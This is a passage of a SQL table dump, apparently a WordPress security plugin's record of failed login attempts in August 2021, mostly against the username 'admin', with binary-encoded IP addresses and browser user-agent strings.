Firefox/62.0'),(4533,6056,1628860759.832487,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4534,6057,1628861465.651993,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���p�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4535,6058,1628861656.979475,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��E','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4536,6058,1628861657.036091,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��E','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4537,6059,1628862402.702001,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4538,6060,1628862589.924768,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4539,6061,1628863294.002081,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4540,6062,1628863489.725454,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4541,6063,1628864204.104240,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\>cc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4542,6063,1628864204.121132,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\>cc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4543,6064,1628864396.715367,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4544,6064,1628864396.772649,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4545,6065,1628865103.459388,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4546,6065,1628865103.479927,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4547,6066,1628865668.955553,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����`�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4548,6066,1628865669.084309,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����`�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4549,6067,1628865720.907245,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ּ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4550,6068,1628866159.132557,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]sO','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(4551,6069,1628866221.252994,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���vSF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4552,6070,1628866749.589022,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��{�?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4553,6071,1628867310.982676,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/p�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4554,6072,1628867611.372612,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��E�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4555,6073,1628867860.210267,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4556,6074,1628868535.083249,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��tK�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4557,6075,1628869740.588846,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��x','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(4558,6076,1628870424.755926,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�-:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0'),(4559,6077,1628870942.177074,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���75�','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(4560,6078,1628872149.228386,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"C��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(4561,6079,1628873349.266741,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�\Z','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(4562,6080,1628874551.560625,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4563,6081,1628877975.113206,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�.6','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4564,6082,1628878177.959229,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(4565,6083,1628879377.862874,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/� ','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4566,6083,1628879377.899922,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/� ','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4567,6084,1628883022.644633,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P�Ҕ','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(4568,6085,1628884191.647516,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-S','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; FDM; .NET4.0C; .NET4.0E; chromeframe/11.0.696.57)'),(4569,6086,1628884265.741305,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(4570,6087,1628885488.743721,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(4571,6087,1628885488.762321,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(4572,6088,1628886696.402395,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H��s','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(4573,6089,1628887929.560340,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4574,6090,1628889142.784415,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6\'iX','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(4575,6091,1628891577.663707,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(4576,6092,1628892818.401030,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(4577,6093,1628894040.393539,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���wң','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(4578,6094,1628895270.507776,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����p�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(4579,6095,1628896504.953357,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(4580,6096,1628897734.955322,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���7o\r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(4581,6097,1628898970.959858,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�\Z','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(4582,6098,1628901455.163561,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]���','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(4583,6099,1628902696.129633,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����Ù','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(4584,6102,1628903945.694669,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��x','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(4585,6103,1628905180.914498,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ļ�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(4586,6104,1628906417.611051,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���wң','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4587,6105,1628907709.123080,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(4588,6106,1628908913.090857,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����M','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(4589,6107,1628911410.277528,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���捫','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(4590,6108,1628912651.975515,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��l���','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(4591,6109,1628913895.334758,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(z��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4592,6110,1628915162.518355,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ƚ�C','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(4593,6111,1628916428.353238,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(4594,6112,1628917683.565812,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��p','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(4595,6113,1628918940.093857,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(4596,6114,1628920193.472126,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����F','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(4597,6115,1628921457.883154,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(4598,6116,1628922717.317661,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(4599,6117,1628923983.663988,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(4600,6118,1628925185.501495,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(4601,6119,1628926525.189898,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H��s','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4602,6120,1628927787.446055,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(4603,6121,1628929048.655480,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(4604,6122,1628930306.841067,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ܧe','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4605,6123,1628931566.115109,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t˖G','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(4606,6124,1628932837.151450,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(4607,6125,1628935346.985126,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"]$d','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(4608,6126,1628936610.761981,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo6','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(4609,6127,1628937882.595091,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>}�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(4610,6128,1628942344.586229,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(4611,6129,1628943615.567017,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_��[','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(4612,6130,1628944891.596784,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(4613,6131,1628947475.361513,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(4614,6132,1628948795.139870,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\'l\0�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(4615,6133,1628950141.444737,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(4616,6134,1628950372.486131,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4617,6135,1628951480.705382,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����s�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(4618,6136,1628952771.580028,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����C-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4619,6137,1628954774.191547,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��MD~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4620,6138,1628956506.230028,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4621,6139,1628958042.310801,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e ��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(4622,6140,1628958264.478515,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���kb','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4623,6141,1628959321.004153,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"]$d','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(4624,6142,1628960030.939852,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4625,6143,1628960605.855533,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(4626,6144,1628961911.156778,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����@','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4627,6145,1628963240.503050,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(4628,6145,1628963240.558076,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(4629,6146,1628963615.655268,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4630,6147,1628964580.164414,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�FW','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(4631,6148,1628965530.778151,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gZ�(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4632,6149,1628965897.338765,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_��[','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(4633,6150,1628967203.857914,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(4634,6151,1628967439.674884,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��12�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4635,6152,1628968503.878983,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%�\r�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(4636,6153,1628969305.638836,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4637,6154,1628969823.361729,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�.�','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46'),(4638,6155,1628971062.304193,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(4639,6156,1628971174.931910,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��mJò','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4640,6157,1628972351.054102,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(4641,6158,1628973112.997968,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VE3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4642,6158,1628973113.090225,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VE3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4643,6159,1628973636.732252,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����U�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(4644,6160,1628974927.421376,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��l���','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(4645,6161,1628975093.338559,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4646,6162,1628977058.953702,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���}z/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4647,6163,1628977497.974885,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(4648,6164,1628978788.715596,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(z��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(4649,6165,1628979105.013224,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���z2�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4650,6166,1628980069.804642,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 